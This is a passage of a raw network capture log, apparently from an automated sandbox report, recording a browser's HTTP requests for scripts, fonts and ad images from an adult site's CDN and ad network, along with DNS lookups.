accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 01 Feb 2025 09:21:23 GMT
content-type: image/x-icon
content-length: 1150
last-modified: Tue, 06 Aug 2024 21:42:05 GMT
etag: "66b298ad-47e"
expires: Fri, 30 May 2025 13:44:47 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
accept-ranges: bytes
x-cdn-diag: lon1-16009-2-3223508-h-0-0---;16007-39-3534234----0-0-1
GET

https://ei.phncdn.com/www-static/js/lib/jquery-3.6.0.min.js

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/js/lib/jquery-3.6.0.min.js HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 01 Feb 2025 09:21:24 GMT
content-type: application/javascript
content-length: 29982
last-modified: Thu, 01 Jun 2023 20:32:16 GMT
etag: "64790050-751e"
content-encoding: br
expires: Tue, 03 Dec 2024 16:55:11 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16008-3-1637486-h-0-0---;16007-39-3534234----0-0-0
GET

https://ei.phncdn.com/www-static/js/header.js?cache=2025013001

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/js/header.js?cache=2025013001 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 01 Feb 2025 09:21:24 GMT
content-type: application/javascript
content-length: 1382
last-modified: Tue, 25 Jun 2024 20:48:47 GMT
etag: "667b2d2f-566"
content-encoding: br
expires: Fri, 30 May 2025 13:44:47 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16009-2-3223508-h-0-0---;16007-39-3534234----0-0-1
GET

https://ei.phncdn.com/www-static/js/lib/jquery-ui-1.13.2.min.js

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/js/lib/jquery-ui-1.13.2.min.js HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 01 Feb 2025 09:21:24 GMT
content-type: application/javascript
content-length: 61467
last-modified: Wed, 20 Sep 2023 16:02:56 GMT
etag: "650b17b0-f01b"
content-encoding: br
expires: Fri, 31 Jan 2025 21:01:23 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16007-2-3264582-h-0-0---;16007-39-3534234----0-0-0
GET

https://ei.phncdn.com/www-static/js/lib/jquery.slimscroll.min.js

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/js/lib/jquery.slimscroll.min.js HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 01 Feb 2025 09:21:24 GMT
content-type: application/javascript
content-length: 1753
last-modified: Thu, 01 Jun 2023 20:32:16 GMT
etag: "64790050-6d9"
content-encoding: br
expires: Sat, 20 Jul 2024 21:44:24 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16007-1-3264518-h-0-0---;16007-39-3534234----0-0-0
GET

https://ei.phncdn.com/www-static/js/phub.js?cache=2025013001

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/js/phub.js?cache=2025013001 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 01 Feb 2025 09:21:24 GMT
content-type: application/javascript
content-length: 11027
last-modified: Thu, 16 Jan 2025 21:18:05 GMT
etag: "6789778d-2b13"
content-encoding: br
expires: Fri, 30 May 2025 13:44:47 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16007-2-3264583-h-0-0---;16007-39-3534234----0-0-0
GET

https://ei.phncdn.com/www-static/js/lib/user-clogs.js?cache=2025013001

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/js/lib/user-clogs.js?cache=2025013001 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 01 Feb 2025 09:21:24 GMT
content-type: application/javascript
content-length: 361
last-modified: Mon, 11 Nov 2024 19:46:35 GMT
etag: "67325f1b-169"
content-encoding: br
expires: Fri, 30 May 2025 13:44:47 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16032-1-3021608-h-0-0---;16007-39-3534234----0-0-0
GET

https://ei.phncdn.com/www-static/js/playlist/playlist-basic.js?cache=2025013001

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/js/playlist/playlist-basic.js?cache=2025013001 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 01 Feb 2025 09:21:24 GMT
content-type: application/javascript
content-length: 5611
last-modified: Mon, 16 Dec 2024 20:24:23 GMT
etag: "67608c77-15eb"
content-encoding: br
expires: Fri, 30 May 2025 13:44:47 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16032-3-3021712-h-0-0---;16007-39-3534234----0-0-0
GET

https://ei.phncdn.com/www-static/js/widgets-live-popup.js?cache=2025013001

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/js/widgets-live-popup.js?cache=2025013001 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 01 Feb 2025 09:21:24 GMT
content-type: application/javascript
content-length: 282
last-modified: Thu, 01 Jun 2023 20:32:16 GMT
etag: "64790050-11a"
content-encoding: br
expires: Fri, 30 May 2025 13:44:47 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16009-3-3223547-h-0-0---;16007-39-3534234----0-0-0
GET

https://ei.phncdn.com/www-static/js/playlist/playlists-common.js?cache=2025013001

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/js/playlist/playlists-common.js?cache=2025013001 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 01 Feb 2025 09:21:24 GMT
content-type: application/javascript
content-length: 1322
last-modified: Wed, 14 Aug 2024 13:17:50 GMT
etag: "66bcae7e-52a"
content-encoding: br
expires: Fri, 30 May 2025 13:44:47 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16008-3-1637487-h-0-0---;16007-39-3534234----0-0-0
GET

https://ei.phncdn.com/www-static/js/v-recaptcha.js?cache=2025013001

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/js/v-recaptcha.js?cache=2025013001 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 01 Feb 2025 09:21:24 GMT
content-type: application/javascript
content-length: 1675
last-modified: Thu, 14 Nov 2024 14:46:54 GMT
etag: "67360d5e-68b"
content-encoding: br
expires: Fri, 30 May 2025 13:44:47 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16008-3-1637486-h-0-0---;16007-39-3534234----0-0-0
GET

https://ei.phncdn.com/www-static/js/lib/signinbox.js?cache=2025013001

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/js/lib/signinbox.js?cache=2025013001 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 01 Feb 2025 09:21:24 GMT
content-type: application/javascript
content-length: 2153
last-modified: Mon, 28 Oct 2024 21:01:19 GMT
etag: "671ffb9f-869"
content-encoding: br
expires: Fri, 30 May 2025 13:44:47 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16008-3-1637486-h-0-0---;16007-39-3534234----0-0-0
GET

https://ei.phncdn.com/www-static/js/signin.js?cache=2025013001

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/js/signin.js?cache=2025013001 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 01 Feb 2025 09:21:24 GMT
content-type: application/javascript
content-length: 2663
last-modified: Wed, 15 Jan 2025 21:22:36 GMT
etag: "6788271c-a67"
content-encoding: br
expires: Fri, 30 May 2025 13:44:47 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16008-3-1637487-h-0-0---;16007-39-3534234----0-0-0
GET

https://ei.phncdn.com/www-static/js/create-account.js?cache=2025013001

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/js/create-account.js?cache=2025013001 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 01 Feb 2025 09:21:24 GMT
content-type: application/javascript
content-length: 4594
last-modified: Wed, 11 Dec 2024 17:10:00 GMT
etag: "6759c768-11f2"
content-encoding: br
expires: Fri, 30 May 2025 13:44:47 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16008-2-1637446-h-0-0---;16007-39-3534234----0-0-1
GET

https://ei.phncdn.com/www-static/js/onboardingModalFlow/widgets-onboardingModalFlow.js?cache=2025013001

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/js/onboardingModalFlow/widgets-onboardingModalFlow.js?cache=2025013001 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 01 Feb 2025 09:21:24 GMT
content-type: application/javascript
content-length: 2804
last-modified: Wed, 08 Jan 2025 19:46:59 GMT
etag: "677ed633-af4"
content-encoding: br
expires: Fri, 30 May 2025 13:44:47 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16008-3-1637486-h-0-0---;16007-39-3534234----0-0-1
GET

https://ei.phncdn.com/www-static/js/ph-footer.js?cache=2025013001

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/js/ph-footer.js?cache=2025013001 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 01 Feb 2025 09:21:24 GMT
content-type: application/javascript
content-length: 1422
last-modified: Thu, 05 Sep 2024 14:58:00 GMT
etag: "66d9c6f8-58e"
content-encoding: br
expires: Fri, 30 May 2025 13:44:47 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16007-1-3264525-h-0-0---;16007-39-3534234----0-0-0
GET

https://ei.phncdn.com/www-static/js/premium/premium-modals.js?cache=2025013001

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/js/premium/premium-modals.js?cache=2025013001 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 01 Feb 2025 09:21:24 GMT
content-type: application/javascript
content-length: 3240
last-modified: Tue, 05 Nov 2024 14:09:22 GMT
etag: "672a2712-ca8"
content-encoding: br
expires: Fri, 30 May 2025 13:44:47 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16009-1-3223444-h-0-0---;16007-39-3534234----0-0-1
GET

https://ei.phncdn.com/www-static/js/lib/generated/front-index-pc.js?cache=2025013001

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/js/lib/generated/front-index-pc.js?cache=2025013001 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 01 Feb 2025 09:21:24 GMT
content-type: application/javascript
content-length: 190
last-modified: Wed, 03 Apr 2024 20:20:49 GMT
etag: "660dba21-be"
content-encoding: br
expires: Fri, 30 May 2025 13:44:49 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16007-1-3264520-h-0-0---;16007-39-3534234----0-0-1
GET

https://ei.phncdn.com/www-static/js/promo-banner.js?cache=2025013001

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/js/promo-banner.js?cache=2025013001 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 01 Feb 2025 09:21:24 GMT
content-type: application/javascript
content-length: 313
last-modified: Mon, 13 Nov 2023 18:15:06 GMT
etag: "655267aa-139"
content-encoding: br
expires: Fri, 30 May 2025 13:44:49 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
vary: Accept-Encoding
timing-allow-origin: *
x-cdn-diag: lon1-16032-3-3021710-h-0-0---;16007-39-3534234----0-0-1
DNS

media.trafficjunky.net

msedge.exe

Remote address:

8.8.8.8:53

Request

media.trafficjunky.net

IN A

Response

media.trafficjunky.net

IN CNAME

media.trafficjunky.net.sds.rncdn7.com

media.trafficjunky.net.sds.rncdn7.com

IN A

64.210.156.23

media.trafficjunky.net.sds.rncdn7.com

IN A

64.210.156.17

media.trafficjunky.net.sds.rncdn7.com

IN A

64.210.156.22

media.trafficjunky.net.sds.rncdn7.com

IN A

64.210.156.20

media.trafficjunky.net.sds.rncdn7.com

IN A

64.210.156.16

media.trafficjunky.net.sds.rncdn7.com

IN A

64.210.156.19

media.trafficjunky.net.sds.rncdn7.com

IN A

64.210.156.21

media.trafficjunky.net.sds.rncdn7.com

IN A

64.210.156.18
GET

https://media.trafficjunky.net/delivery/js/abp/js1.js

msedge.exe

Remote address:

64.210.156.23:443

Request

GET /delivery/js/abp/js1.js HTTP/2.0
host: media.trafficjunky.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 01 Feb 2025 09:21:22 GMT
content-type: application/javascript
content-length: 13
last-modified: Tue, 08 Dec 2015 21:50:49 GMT
etag: "131e477ac-d-52669f77ae040"
expires: Sun, 21 Jul 2024 04:19:34 GMT
cache-control: max-age=1721535574
vary: Accept-Encoding
accept-ranges: bytes
x-cdn-diag: lon1-16007-2-3264582-h-0-0---;16007-27-3534234----0-0-1
GET

https://pix-ht.trafficjunky.net/c3721/uploaded_content/creative/103/100/600/1/1031006001.gif/plain/q:85?validfrom=1737796881&validto=1739006481&hash=UOi59j%2FwAppldCmlJs1lJRf5Vuo%3D

msedge.exe

Remote address:

64.210.156.23:443

Request

GET /c3721/uploaded_content/creative/103/100/600/1/1031006001.gif/plain/q:85?validfrom=1737796881&validto=1739006481&hash=UOi59j%2FwAppldCmlJs1lJRf5Vuo%3D HTTP/2.0
host: pix-ht.trafficjunky.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 01 Feb 2025 09:21:23 GMT
content-type: image/webp
content-length: 75372
cache-control: max-age=31536000, public
content-disposition: inline; filename="1031006001.webp"
content-security-policy: script-src 'none'
vary: Accept
x-origin-content-length: 71623
x-origin-height: 4500
x-origin-width: 300
x-request-id: 678A4831-D812A85401BB26499C-250E3
x-result-height: 4500
x-result-width: 300
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
access-control-allow-origin: *
access-control-allow-methods: GET,HEAD,OPTIONS
x-cdn-diag: lon1-16007-1-3264518-h-0-0---;16007-34-3534234----0-0-1
DNS

cdn1-smallimg.phncdn.com

msedge.exe

Remote address:

8.8.8.8:53

Request

cdn1-smallimg.phncdn.com

IN A

Response

cdn1-smallimg.phncdn.com

IN CNAME

smallimg.phncdn.com

smallimg.phncdn.com

IN A

66.254.114.156
GET

https://cdn1-smallimg.phncdn.com/n172nWs1UEcnquuObA5x52osw51230gH/rta-1.gif

msedge.exe

Remote address:

66.254.114.156:443

Request

GET /n172nWs1UEcnquuObA5x52osw51230gH/rta-1.gif HTTP/2.0
host: cdn1-smallimg.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.pornhub.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: openresty
date: Sat, 01 Feb 2025 09:21:22 GMT
content-type: image/gif
content-length: 1882
last-modified: Thu, 08 Oct 2015 21:35:30 GMT
etag: "5616e1a2-75a"
expires: Mon, 03 Mar 2025 09:21:22 GMT
cache-control: max-age=2592000
accept-ranges: bytes
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
GET

https://ei.phncdn.com/www-static/fonts/ph-icons/ph-icons.woff2?cache=2025013001

msedge.exe

Remote address:

64.210.156.21:443

Request

GET /www-static/fonts/ph-icons/ph-icons.woff2?cache=2025013001 HTTP/2.0
host: ei.phncdn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://www.pornhub.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: font
referer: https://ei.phncdn.com/www-static/css/generated-header.css?cache=2025013001
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 01 Feb 2025 09:21:22 GMT
content-type: application/octet-stream
content-length: 31140
last-modified: Wed, 18 Dec 2024 20:50:22 GMT
etag: "6763358e-79a4"
expires: Fri, 30 May 2025 13:44:47 GMT
cache-control: max-age=10368000
access-control-allow-origin: *
timing-allow-origin: *
accept-ranges: bytes
x-cdn-diag: lon1-16032-2-3021669-h-0-0---;16009-28-3492589----0-0-1
DNS

41.114.254.66.in-addr.arpa

Remote address:

8.8.8.8:53

Request

41.114.254.66.in-addr.arpa

IN PTR

Response

41.114.254.66.in-addr.arpa

IN PTR

reflectededge reflectednet
DNS

19.156.210.64.in-addr.arpa

Remote address:

8.8.8.8:53

Request

19.156.210.64.in-addr.arpa

IN PTR

Response
DNS

21.156.210.64.in-addr.arpa

Remote address:

8.8.8.8:53

Request

21.156.210.64.in-addr.arpa

IN PTR

Response
DNS

23.156.210.64.in-addr.arpa

Remote address:

8.8.8.8:53

Request

23.156.210.64.in-addr.arpa

IN PTR

Response
DNS

156.114.254.66.in-addr.arpa

Remote address:

8.8.8.8:53

Request

156.114.254.66.in-addr.arpa

IN PTR

Response

156.114.254.66.in-addr.arpa

IN PTR

reflectededge reflectednet
DNS

200.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

200.187.250.142.in-addr.arpa

IN PTR

Response

200.187.250.142.in-addr.arpa

IN PTR

lhr25s33-in-f81e100net
DNS

ss.phncdn.com

msedge.exe

Remote address:

8.8.8.8:53

Request

ss.phncdn.com

IN A

Response

ss.phncdn.com

